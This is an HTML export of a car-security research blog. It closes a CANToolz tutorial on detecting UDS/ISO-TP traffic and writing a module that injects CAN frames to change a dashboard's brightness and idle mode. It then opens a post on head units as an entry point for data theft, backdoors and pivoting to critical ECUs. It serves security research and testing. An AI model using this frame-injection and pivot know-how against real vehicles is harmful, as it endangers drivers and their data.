vertical-align: baseline; white-space: pre-wrap;"> also supports UDS. 
</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> also has a "traffic analysis" feature that tries to detect and rebuild ISO-TP and UDS. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, it could look like this:</span></div>
<span id="docs-internal-guid-290a29cd-ba22-bd19-6af6-679a1ca977f1"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> has finished its work, you will have some traffic: generated requests and some responses...</span></div>
</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMHzhtYm6XuQYt452-j2V_1eJE2Hc2uRZ0wZ7_Na_VaKu9ZC4PdTPOE9X3zIUWM3GZ19xzkyXDP3LGC8SWBpDK7xg24l46iLjOPmBSEO2EgCS4rKuif5yV4ZN_f7HFvzjmPxantzOIwvuP/s1600/uds1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMHzhtYm6XuQYt452-j2V_1eJE2Hc2uRZ0wZ7_Na_VaKu9ZC4PdTPOE9X3zIUWM3GZ19xzkyXDP3LGC8SWBpDK7xg24l46iLjOPmBSEO2EgCS4rKuif5yV4ZN_f7HFvzjmPxantzOIwvuP/s1600/uds1.png" /></a></div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Then </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> can analyze this traffic to detect UDS/ISOTP</span><br />
<div>
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_umMVnZKKofwrrq4-GuJfoYgMSDJwabDnroIUh4MIETKe7ntGqS0GKrzzRhEAzufwHQdO2S17mVpCTLWJ0z2hsToUFemnhArvW-SII6wOsbqy9VUjQggPcXWznp8XjeVSmdFO2TM7xkdG/s1600/uds2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_umMVnZKKofwrrq4-GuJfoYgMSDJwabDnroIUh4MIETKe7ntGqS0GKrzzRhEAzufwHQdO2S17mVpCTLWJ0z2hsToUFemnhArvW-SII6wOsbqy9VUjQggPcXWznp8XjeVSmdFO2TM7xkdG/s1600/uds2.png" /></a></div>
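What "detect and rebuild ISO-TP and UDS" involves, as an added example that is not mod_stat's code and not from the original post: it reassembles ISO-TP messages from raw frames and then pairs UDS requests with their responses. The capture is constructed, and classic 8-byte CAN with normal addressing is assumed.

```python
"""Rebuild ISO-TP (ISO 15765-2) messages from raw CAN frames and pair UDS
requests with their responses."""

UDS_SERVICES = {            # a few ISO 14229 request service IDs
    0x10: "DiagnosticSessionControl",
    0x11: "ECUReset",
    0x22: "ReadDataByIdentifier",
    0x27: "SecurityAccess",
    0x3E: "TesterPresent",
}
UDS_NRC = {                 # a few negative response codes
    0x11: "serviceNotSupported",
    0x12: "subFunctionNotSupported",
    0x31: "requestOutOfRange",
    0x33: "securityAccessDenied",
}

# Constructed capture in ID#DATA notation (not from a real vehicle).
CAPTURE = [
    "7E0#0210030000000000",   # single frame: session control request
    "7E8#065003003201F400",   # single frame: positive response
    "06F#0201000000000000",   # ordinary traffic that only looks like ISO-TP
    "7E0#0322F19000000000",   # single frame: read data identifier F190
    "7E8#101462F190544553",   # first frame, total length 0x014 = 20 bytes
    "7E0#3000000000000000",   # flow control from the tester
    "7E8#215456494E303132",   # consecutive frame, sequence 1
    "7E8#2233343536373839",   # consecutive frame, sequence 2
    "7E0#0227010000000000",   # single frame: security access request
    "7E8#037F273300000000",   # single frame: negative response
]


def parse_frame(line):
    """'7E0#0210...' -> (0x7E0, b'\\x02\\x10...')."""
    can_id, data = line.split("#")
    return int(can_id, 16), bytes.fromhex(data)


def reassemble_isotp(frames):
    """frames: iterable of (can_id, data). Returns [(can_id, payload), ...]."""
    pending = {}    # can_id -> [total_length, buffer, next_sequence_number]
    messages = []
    for can_id, data in frames:
        if not data:
            continue
        pci = data[0] >> 4
        if pci == 0x0:                              # single frame
            length = data[0] & 0x0F
            if 1 <= length <= len(data) - 1:
                messages.append((can_id, bytes(data[1:1 + length])))
        elif pci == 0x1 and len(data) >= 3:         # first frame
            length = ((data[0] & 0x0F) << 8) | data[1]
            if length > 7:
                pending[can_id] = [length, bytearray(data[2:]), 1]
        elif pci == 0x2 and can_id in pending:      # consecutive frame
            state = pending[can_id]
            if (data[0] & 0x0F) != state[2]:
                del pending[can_id]                 # lost frame: drop the message
                continue
            state[1].extend(data[1:])
            state[2] = (state[2] + 1) & 0x0F
            if len(state[1]) >= state[0]:
                messages.append((can_id, bytes(state[1][:state[0]])))
                del pending[can_id]
        # pci == 0x3 is flow control and carries no payload
    return messages


def find_uds_exchanges(messages):
    """Pair each known request with the first later message from another ID
    that answers it. Returns (req_id, resp_id, service, outcome, data) tuples."""
    exchanges = []
    for i, (req_id, req) in enumerate(messages):
        sid = req[0]
        if sid not in UDS_SERVICES:
            continue
        for resp_id, resp in messages[i + 1:]:
            if resp_id == req_id:
                continue
            if resp[0] == sid + 0x40:               # positive response
                exchanges.append((req_id, resp_id, UDS_SERVICES[sid], "positive", resp[1:]))
                break
            if len(resp) >= 3 and resp[0] == 0x7F and resp[1] == sid:
                nrc = UDS_NRC.get(resp[2], "NRC 0x%02X" % resp[2])
                exchanges.append((req_id, resp_id, UDS_SERVICES[sid], nrc, b""))
                break
    return exchanges


if __name__ == "__main__":
    msgs = reassemble_isotp(parse_frame(line) for line in CAPTURE)
    for can_id, payload in msgs:
        print("%03X %s" % (can_id, payload.hex()))
    for req_id, resp_id, service, outcome, data in find_uds_exchanges(msgs):
        print("%03X -> %03X %s: %s %s" % (req_id, resp_id, service, outcome, data.hex()))
```

The 06F frame parses as a two-byte single frame, which is why ISO-TP detection alone is only a heuristic; the request/response pairing is what filters it out.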
<div>
<br /></div>
<div>
<br /></div>
<h3 style="text-align: left;">
DEV API</h3>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To analyze a CAN network you will need general modules and test scenarios. The most interesting part comes after you finish this analysis: you will have found some frames and understood the traffic, commands, etc., and then you have to build a module that reproduces the results of your research (or add another general module for more tricks). </span></div>
<span id="docs-internal-guid-290a29cd-ba23-f1d2-b9e2-04807ebe20ad"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Anyway, let me describe how easily you could do it. Imagine I have found some CAN frames that control the brightness level and IDLE status of the dashboard display, and now I want to add these controls to a CANToolz module. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<div>
Found:</div>
<div>
Message 06F#01XX000000000000 - change brightness level to XX</div>
<div>
Message 06F#0200000000000000 - IDLE mode off</div>
<div>
Message 06F#0201000000000000 - IDLE mode on</div>
<div>
<br /></div>
<div>
The following code represents those controls as a module:</div>
<div>
<br /></div>
<div>
<ol class="j-transcripts transcripts no-bullet no-style" itemprop="text" style="background-color: #eeeeee; box-sizing: inherit; color: #3b3835; font-family: 'Helvetica Neue', Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 1.6; list-style: none; margin: 0px 0px 1.42857rem 1.4rem; padding: 0px; text-align: left;">
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">from libs.module import *</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">from libs.can import *</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">import copy</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">class <b>mod_panel_control</b>(CANModule):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    name = "Panel control module"</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    help = """</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    This module changes dashboard panel things.</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    Init parameters: None</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    Module parameters:</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">      'pipe' - integer, 1 or 2 - from which pipe to print, default 1</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    """</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    def <b>do_init</b>(self, params):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        # Called once when the module is loaded: register the user commands.</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._active = True</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._cmdList['1'] = ["Idle mode on", 0, "", self.turn_on]</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._cmdList['0'] = ["Idle mode off", 0, "", self.turn_off]</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._cmdList['b'] = ["Change brightness level (0 - 255)", 1, "&lt;level&gt;", self.change_level]</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._frame = None  # frame waiting to be sent, if any</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    def <b>do_effect</b>(self, can_msg, args):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        # Called in the main loop: put the pending frame, if any, into the PIPE.</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        if self._frame:</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">            can_msg.CANFrame = copy.deepcopy(self._frame)</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">            can_msg.CANData = True</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">            self._frame = None</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        return can_msg</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    def <b>turn_off</b>(self):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        # 111 == 0x06F; 06F#0200000000000000 - IDLE mode off</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._frame = CANMessage(111, 8, [2, 0, 0, 0, 0, 0, 0, 0], False, CANMessage.DataFrame)</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    def <b>turn_on</b>(self):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        # 06F#0201000000000000 - IDLE mode on</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        self._frame = CANMessage(111, 8, [2, 1, 0, 0, 0, 0, 0, 0], False, CANMessage.DataFrame)</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px;"><br /></li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">    def <b>change_level</b>(self, level):</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        # 06F#01XX000000000000 - change brightness level to XX</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        b_level = int(level)</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">        if 0 &lt;= b_level &lt;= 255:</li>
<li style="box-sizing: inherit; margin: 0px; padding: 0px; white-space: pre-wrap;">            self._frame = CANMessage(111, 8, [1, b_level, 0, 0, 0, 0, 0, 0], False, CANMessage.DataFrame)</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">do_init</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> -</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> This method is called when the module is loaded, and it takes init parameters from the load_module section. In this step we initialize the control commands, and we have just three of them: idle off, idle on and change brightness.</span></div>
<b id="docs-internal-guid-290a29cd-ba24-ad92-1e4f-d96878bf4c37" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">do_effect</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> -</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> This is the main method, and it is called in the loop. The input parameter </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">can_msg </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">is the message from the PIPE. The module should return the message back after handling it. Our module is not about reading messages - we do not care about the input, but we generate new messages (commands to the dashboard). All </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_*</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> modules work the same way. This means that this module can "rewrite" the last message from the PIPE, so you do not need to put such modules after other modules in the same PIPE.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this step, you need to check whether there is a message to send (self._frame) and, if so, put it into the PIPE.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The other functions are commands that are called on user request; they set up the message to send (self._frame). </span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A simple config for this setup will be:</span></div>
</div>
<div>
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlFem1ReF_2_qnMDBTpqW0PdvWycjXw3RYmmyeX3Ab0qsIffTBE9oEI_svfoeKrlh98skBJtIEs0_oXNsgXkP4loExJ43iGmoVAuaW039l-Q5ykbp9yUS5wN24RXOZFPqgeUc9zKAwHEF9/s640/cont1.png" width="640" /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
You can find other methods in other modules or by reviewing ./libs/module.py<br />
<br />
The GUI, where you can easily perform these actions:</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlFem1ReF_2_qnMDBTpqW0PdvWycjXw3RYmmyeX3Ab0qsIffTBE9oEI_svfoeKrlh98skBJtIEs0_oXNsgXkP4loExJ43iGmoVAuaW039l-Q5ykbp9yUS5wN24RXOZFPqgeUc9zKAwHEF9/s1600/cont1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6elaz7SN5de3CgZUwbD1F4XHmH_JC6-N08iouKYTK8BdKx7un9kA_VbLSZaBut0okiZgdCYE4iATFSDQwYA5IgLzgJ5W4BwwKOIRQiThtfMA8XiBZKfz5EwyDNlcgoHOr1RdG-Ce8Fu0u/s1600/cont2.png" /><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Epilogue</h3>
<div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Above, I have tried to describe why I started to do this and why it is important, and I hope that some of you will find this tool useful and will contribute to it. </span></div>
<span id="docs-internal-guid-290a29cd-ba26-3dea-547d-0399c02b019d"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">The main idea here is to give more people access to vehicles and hardware, so that we can build modules for specific things and create more test scenarios and modules for black-box testing. In addition, OEM developers and vendors can use it for test verification or something like that (if it suits). I don’t know... so let's see together if it will fly or not 8)</span></span></div>
</div>
Alexey Sintsov (http://www.blogger.com/profile/16563676942164858618)<br />
<br />
Head Unit as a target for hackers (2015-07-23T12:57:00.001-07:00, updated 2015-07-24T01:54:54.848-07:00)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Head Unit as a target for hackers.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In recent years the problem of car hacking has been raised more and more frequently. It concerns almost everyone: car manufacturers, OEMs and information security specialists. Of course, EU and USA authorities are also interested in it and fund research in this field. Since in the information security industry some activities are just attempts to scare and some problems are deliberately overestimated, I would like to look into this subject without unnecessary emotions but keeping in mind that it's always best to err on the side of caution. In my own professional realm I deal with ConnectedCar system security and embedded solutions for vehicle systems. So I would like to talk about new threats in IoT and cars in the near future. This part is about potential attack vectors on the Head Unit and its environment.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/a93/cc0/cad/a93cc0cade094ba9bf973f58b9787b84.jpg" height="298px;" src="https://lh5.googleusercontent.com/4d8nlp48LsMwNgpyFeNPEYtqCQrNBcfU9dHgnnLasQNM62pnNfN2BfFRdMqWBWBN5oObNDOyrDbe5U_Q6R9Gb3KEEppxCpupebrCbiKK4vnNp9tTrcMTopEhTpur1DgFg3HlX-pupwxXN1vI" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="530px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Is Head Unit a desirable target?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Why did I focus on the Head Unit in particular? Of course there are other interesting and more control-critical targets in a vehicle system. The Head Unit (hereinafter shortened to HU), or to be more precise its logical component IVI (in-vehicle infotainment; sometimes I will use the term HU to mean IVI), includes the entertainment media and navigation system and manages things that are not security-critical, such as the air conditioner and cab lighting. In a common car the HU is not connected to crucial ECUs (an Electronic Control Unit is a controller of some node: a vehicle subsystem, power supply or ABS). However, because of the large scale of computer automation there are other interesting functions: door locks, window raisers and opening of the car boot. And when I say that there is no direct network connection via CAN, that doesn't mean that there is no logical interface to critical ECUs. For example, in some network layouts the HU is connected to a CAN gateway, and access to more interesting components is allowed from that gateway. Or the HU can be connected to some other interesting interfaces, for example Cruise Control. Here you can see the analogy with internal penetration testing: if you already have access to the HU you can hack the gateway as an intermediate node and then attack some important ECU from it. 
I won't dive deep into ECU and CAN security issues; they are already well known, and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Charlie Miller</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Chris Valasek</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (just to show off a little bit I’ll mention that I drank a beer with Chris and other speakers at CONFidence 2011, but I'm not sure if he even remembers me) have made a review of them which includes authentication issues and brute force of ECUs via the CAN bus. 
You can find this review here - </span><a href="http://illmatics.com/car_hacking.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://illmatics.com/car_hacking.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. In summary: the HU is a very good entry point. For me it is also the handiest target, and here is why:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1) User data.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The HU runs an operating system that has access to user data. An attack on a car system can be an instrument for spying on the user, for example. It should be noted that all User Experience features, such as automatic parking or fuel payment, which provide interesting user data, are also located in the HU.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 2) Convenient place for a backdoor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The HU file system is usually mounted read-only, but there are some opportunities to load a backdoor with permanent access to the network. There can be technical difficulties in breaking the protection created by the vendor, but from any point of view the HU is the most convenient place to take control over the system with subsequent stable access. For those who are interested in which operating systems are used for IVI, I can tell you that there is a big variety: from QNX and Linux to Windows CE and Android! (An HU can contain several CPUs and OSs, not only one.)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 3) Attack development.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This also follows from item 2. The HU is a component from which to start attacks on ECUs (or the CAN gateway) for privilege escalation and other evil. It should be added that the HU has the highest performance among all computers in a car. Different manufacturers use different CPUs and RAM units of various capacity, but on the whole the embedded hardware is rather powerful (as it is used to render some GUI, handle network traffic, play music and do all these operations in parallel). Usually ARM Cortex 6 is used, Tegra 2 or 3, for example, but this may vary.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
